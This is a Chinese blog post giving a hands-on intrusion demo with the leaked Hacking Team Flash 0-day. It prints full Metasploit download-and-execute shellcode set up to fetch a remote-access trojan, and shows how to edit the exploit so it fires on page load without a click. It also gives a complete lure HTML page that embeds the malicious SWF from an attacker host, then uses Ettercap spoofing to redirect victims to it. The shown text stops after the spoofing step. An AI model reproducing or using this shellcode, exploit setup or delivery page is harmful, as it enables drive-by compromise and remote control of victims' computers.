admin 发表于 2018-10-20 20:28:55

flash 0day之手工代码修改制作下载者实例入侵演示

<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span>三、</span></span><span style="font-family:宋体;font-size:10.5000pt;">flash 0day<span style="font-family:宋体;">之手工代码修改制作下载者实例入侵演示</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">利用到的工具:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">Msf</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">Ettercap</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">Adobe Flash CS6</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">Hacking Team Flash 0day-<span style="font-family:宋体;">可冲破</span><span style="font-family:Calibri;">Chrome</span><span style="font-family:宋体;">沙盒</span><span style="font-family:Calibri;">-Evil0X</span><span style="font-family:宋体;">源代码一份</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">下面我们就开始演示入侵,利用</span>msf<span style="font-family:宋体;">生成</span><span style="font-family:Calibri;">shellcode,</span><span style="font-family:宋体;">首先打开</span><span style="font-family:Calibri;">msf</span><span style="font-family:宋体;">执行</span><span style="font-family:Calibri;">use windows/download_exec</span><span style="font-family:宋体;">,</span><span style="font-family:Calibri;">show options</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">如图:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="553" height="266" src="https://www.2k8.org/content/uploadfile/201809/22/3e0b257e513b4e75ba87593d3080cd28.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">然后</span>set EXE system.exe,<span style="font-family:宋体;">再执行</span><span style="font-family:Calibri;">set URL,</span><span style="font-family:宋体;">需要说明一下</span><span style="font-family:Calibri;">URL</span><span style="font-family:宋体;">就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图</span><span style="font-family:Calibri;">:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="553" height="260" src="https://www.2k8.org/content/uploadfile/201809/22/9ac60d805663489f97bb2f57c0336856.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">然后执行</span>generate -t dword<span style="font-family:宋体;">生成</span><span style="font-family:Calibri;">shellcode</span><span style="font-family:宋体;">,如下:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="273" src="https://www.2k8.org/content/uploadfile/201809/22/d4570cf3fe6442cbb20769d7566aaad6.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">复制代码到文本下便于我们一会编辑</span></span><span style="font-family:宋体;font-size:10.5000pt;">flash exp<span style="font-family:宋体;">,如下:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">下面我们来修改</span>flash 0day exp<span style="font-family:宋体;">,需要修改三个文件,分别为:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="303" src="https://www.2k8.org/content/uploadfile/201809/22/4d5ec7717c8341eeab2f9647e3db20f6.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">先修改</span>ShellWin32.as<span style="font-family:宋体;">,部分源代码如图:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="280" src="https://www.2k8.org/content/uploadfile/201809/22/1a93f293bdf54bc6ad34db7f451e37dc.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">我们需要把标记处</span>[]<span style="font-family:宋体;">中的代码改成用</span><span style="font-family:Calibri;">msf</span><span style="font-family:宋体;">生成的代码,修改后如下:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="299" src="https://www.2k8.org/content/uploadfile/201809/22/b42a8f0df2c54f17b7b29ff3bdf5f443.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">然后保存,</span>ShellWin64.as<span style="font-family:宋体;">的修改方法如上述,不再演示,下面我们来修改</span></span><span style="font-family:宋体;font-size:10.5000pt;">myclass.as,<span style="font-family:宋体;">这里需要说明一下,因为此</span><span style="font-family:Calibri;">exp</span><span style="font-family:宋体;">生成的利用程序,不能直接自动触发</span><span style="font-family:Calibri;">flash</span><span style="font-family:宋体;">漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索</span><span style="font-family:Calibri;">myclass</span><span style="font-family:宋体;">的某个字符</span><span style="font-family:Calibri;">doc.addchild(btn);</span><span style="font-family:宋体;">如图:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="335" src="https://www.2k8.org/content/uploadfile/201809/22/e2c1ff356f6240a68d43a84cfea70649.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">换行在后面加一句</span>TryExpl();<span style="font-family:宋体;">注意是</span></span><span style="font-family:宋体;font-size:10.5000pt;">l<span style="font-family:宋体;">不是数字</span><span style="font-family:Calibri;">1</span><span style="font-family:宋体;">,然后如图:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="316" src="https://www.2k8.org/content/uploadfile/201809/22/c03c49e4e0e04cf68c7c7b66f874b0ec.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">然后点保存,下面我们来编译一下,打开</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">exp1.fla<span style="font-family:宋体;">然后点文件</span><span style="font-family:Calibri;">-</span><span style="font-family:宋体;">发布,看看编译没错误</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="553" height="289" src="https://www.2k8.org/content/uploadfile/201809/22/8fff1aa0a68e4355a1c9a13468ecacc6.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">然后我们把生成的</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">exp1.swf<span style="font-family:宋体;">丢到</span><span style="font-family:Calibri;">kailinux </span><span style="font-family:宋体;">的</span><span style="font-family:Calibri;">/var/www/html</span><span style="font-family:宋体;">下:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">然后把这段代码好好编辑一下</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;!DOCTYPE html&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;html&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;head&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;meta http-equiv="Content-Type" content="text/html; </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">charset=utf-8"/&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;/head&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;body&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;h2&gt; Please wait, the requested page is loading...&lt;/h2&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;br&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;OBJECT </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" &nbsp;WIDTH="50" HEIGHT="50" id="4"&gt;&lt;PARAM NAME=movie </span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">VALUE="http://192.168.0.109/exp1.swf"&gt;&lt;/OBJECT&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;/body&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;script&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;&nbsp;&nbsp;&nbsp;setTimeout(function () {</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">window.location.reload();</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;&nbsp;&nbsp;&nbsp;}, 10000);</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;/script&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&lt;/html&gt;</span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">注意:</span>192.168.0.109<span style="font-family:宋体;">是</span><span style="font-family:Calibri;">kali</span><span style="font-family:宋体;">的</span><span style="font-family:Calibri;">ip</span><span style="font-family:宋体;">地址,这时候我们需要</span><span style="font-family:Calibri;">service apache2 start</span><span style="font-family:宋体;">启动一下</span><span style="font-family:Calibri;">web</span><span style="font-family:宋体;">服务,然后将上面的</span><span style="font-family:Calibri;">html</span><span style="font-family:宋体;">保存为</span><span style="font-family:Calibri;">index.htm</span><span style="font-family:宋体;">同样丢到</span><span style="font-family:Calibri;">kali web</span><span style="font-family:宋体;">目录下,测试访问链接存在如图:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="284" src="https://www.2k8.org/content/uploadfile/201809/22/1455e7d77d264f148c1ddc90cabd2518.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">下面我们用</span></span><span style="font-family:宋体;font-size:10.5000pt;">ettercap<span style="font-family:宋体;">欺骗如图:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <img width="554" height="257" src="https://www.2k8.org/content/uploadfile/201809/22/92cfaf4fe6304b07a705be395b6a26db.jpg" /><span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:Calibri;font-size:10.5000pt;">&nbsp;</span>
</p>
<p style="font-family:Calibri;font-size:10.5000pt;margin:0pt;margin-bottom:.0001pt;text-align:justify;text-justify:inter-ideograph;">
        <span style="font-family:宋体;font-size:10.5000pt;"><span style="font-family:宋体;">下面我们随便访问个网站看看:</span></span><span style="font-family:宋体;font-size:10.5000pt;"></span>
</p>
